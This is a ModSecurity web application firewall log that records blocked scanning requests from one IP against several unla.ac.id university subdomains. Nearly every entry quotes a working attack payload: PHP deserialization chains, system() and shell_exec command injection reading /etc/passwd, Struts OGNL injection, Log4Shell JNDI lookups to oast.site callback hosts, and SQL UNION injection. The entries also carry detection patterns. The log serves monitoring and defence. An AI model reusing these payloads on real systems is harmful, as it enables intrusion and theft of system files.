[Tue Aug 29 11:35:02.354643 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATUxRwAAAAW"]
[Tue Aug 29 11:35:02.358594 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUDQTwAAAA7"]
[Tue Aug 29 11:35:02.360465 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAATQXiMAAAAO"]
[Tue Aug 29 11:35:03.317774 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUQ7sgAAABH"]
[Tue Aug 29 11:35:03.318071 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUXLkAAAABM"]
[Tue Aug 29 11:35:03.318707 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAASHh9gAAAAD"]
[Tue Aug 29 11:35:03.319547 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVJXkwAAAAA"]
[Tue Aug 29 11:35:03.319842 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUOaU0AAABG"]
[Tue Aug 29 11:35:03.319959 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAASEJYYAAAAE"]
[Tue Aug 29 11:35:03.323145 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11d8Co-f0AAATSkoIAAAAT"]
[Tue Aug 29 11:35:03.323614 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAARdiTYAAAAK"]
[Tue Aug 29 11:35:03.324776 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUTiYsAAABJ"]
[Tue Aug 29 11:35:03.326686 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUJIzUAAABB"]
[Tue Aug 29 11:35:03.327313 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVQYyAAAAAI"]
[Tue Aug 29 11:35:03.331358 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAATUxR0AAAAW"]
[Tue Aug 29 11:35:03.335772 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11d8Co-f0AAATWYSEAAAAa"]
[Tue Aug 29 11:35:03.340601 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAShCacAAAAi"]
[Tue Aug 29 11:35:03.341883 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVK0HoAAAAB"]
[Tue Aug 29 11:35:03.344309 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUOaU4AAABG"]
[Tue Aug 29 11:35:04.314688 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgxh14gmezucxoj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAAVQYyEAAAAI"]
[Tue Aug 29 11:35:04.317586 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUbg1kAAABQ"]
[Tue Aug 29 11:35:04.324017 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUR84sAAABI"]
[Tue Aug 29 11:35:04.327711 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAAVJXk0AAAAA"]
[Tue Aug 29 11:35:04.333615 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlg5juxoafcnj53g.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAAUGZAUAAAA@"]
[Tue Aug 29 11:35:04.338674 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlga54f1581je9wj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAATavvYAAAAg"]
[Tue Aug 29 11:35:04.339722 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUZcGQAAABO"]
[Tue Aug 29 11:35:04.341461 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAATSkoMAAAAT"]
[Tue Aug 29 11:35:04.359655 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAASPDNQAAAAS"]
[Tue Aug 29 11:35:04.364896 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAATUxR8AAAAW"]
[Tue Aug 29 11:35:04.379697 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11eMCo-f0AAAPLwKYAAAAX"]
[Tue Aug 29 11:35:04.386890 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgoegjxbzjec6ch.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAASEJYcAAAAE"]
